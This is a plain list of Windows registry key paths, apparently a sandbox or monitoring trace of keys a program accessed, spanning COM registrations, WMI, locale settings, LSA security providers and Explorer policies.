HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableObjectValidation
HKEY_CURRENT_USER\Control Panel\International
HKEY_CURRENT_USER\Control Panel\International\LocaleName
HKEY_CURRENT_USER\Control Panel\International\sCountry
HKEY_CURRENT_USER\Control Panel\International\sList
HKEY_CURRENT_USER\Control Panel\International\sDecimal
HKEY_CURRENT_USER\Control Panel\International\sThousand
HKEY_CURRENT_USER\Control Panel\International\sGrouping
HKEY_CURRENT_USER\Control Panel\International\sNativeDigits
HKEY_CURRENT_USER\Control Panel\International\sCurrency
HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep
HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep
HKEY_CURRENT_USER\Control Panel\International\sMonGrouping
HKEY_CURRENT_USER\Control Panel\International\sPositiveSign
HKEY_CURRENT_USER\Control Panel\International\sNegativeSign
HKEY_CURRENT_USER\Control Panel\International\sTimeFormat
HKEY_CURRENT_USER\Control Panel\International\sShortTime
HKEY_CURRENT_USER\Control Panel\International\s1159
HKEY_CURRENT_USER\Control Panel\International\s2359
HKEY_CURRENT_USER\Control Panel\International\sShortDate
HKEY_CURRENT_USER\Control Panel\International\sYearMonth
HKEY_CURRENT_USER\Control Panel\International\sLongDate
HKEY_CURRENT_USER\Control Panel\International\iCountry
HKEY_CURRENT_USER\Control Panel\International\iMeasure
HKEY_CURRENT_USER\Control Panel\International\iPaperSize
HKEY_CURRENT_USER\Control Panel\International\iDigits
HKEY_CURRENT_USER\Control Panel\International\iLZero
HKEY_CURRENT_USER\Control Panel\International\iNegNumber
HKEY_CURRENT_USER\Control Panel\International\NumShape
HKEY_CURRENT_USER\Control Panel\International\iCurrDigits
HKEY_CURRENT_USER\Control Panel\International\iCurrency
HKEY_CURRENT_USER\Control Panel\International\iNegCurr
HKEY_CURRENT_USER\Control Panel\International\iCalendarType
HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek
HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear
HKEY_CLASSES_ROOT\CLSID\{d63a5850-8f16-11cf-9f47-00aa00bf345c}\InProcServer32
HKEY_CLASSES_ROOT\CLSID\{d63a5850-8f16-11cf-9f47-00aa00bf345c}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\Synchronization
HKEY_CLASSES_ROOT\CLSID\{d63a5850-8f16-11cf-9f47-00aa00bf345c}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\AppId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SecuredHostProviders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SecuredHostProviders\ROOT\CIMV2:__Win32Provider.Name="CIMWin32"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\OleAut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LsaExtensionConfig\SspiCli
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureDll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureRoutine
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SecurityProviders
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\SspiCache
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Comment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\RpcId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Version
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\TokenSize
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\SaslProfiles
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextLockCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextListCount
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\LocaleName
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sCountry
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sList
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sDecimal
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sThousand
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sGrouping
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sNativeDigits
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sCurrency
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sMonDecimalSep
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sMonThousandSep
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sMonGrouping
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sPositiveSign
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sNegativeSign
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sTimeFormat
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sShortTime
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\s1159
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\s2359
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sShortDate
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sYearMonth
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\sLongDate
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\iCountry
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\iMeasure
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\iPaperSize
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\iDigits
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\iLZero
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\iNegNumber
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\NumShape
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\iCurrDigits
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\iCurrency
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\iNegCurr
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\iCalendarType
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\iFirstDayOfWeek
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Control Panel\International\iFirstWeekOfYear
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Plus! ProductId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallDate
HKEY_LOCAL_MACHINE\SYSTEM\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemPartition
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\PriorityControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PriorityControl\Win32PrioritySeparation
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Rpc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LicenseInfo\FilePrint
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\DA0C75D6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20127
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}\1.0\0\win32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{04731B67-D933-450a-90E6-4ACD2E9408FE}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{11016101-E366-4D22-BC06-4ADA335C892B}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{26EE0668-A00A-44D7-9371-BEB064C98683}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{450D8FBA-AD25-11D0-98A8-0800361B1103}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{89D83576-6BD1-4c86-9454-BEB04E94C819}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{9343812e-1c37-4a49-a12e-4b2d810d956b}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{daf95313-e44d-46af-be1b-cbacea2c3065}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{e345f35f-9397-435c-8f95-4e922c26259e}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum
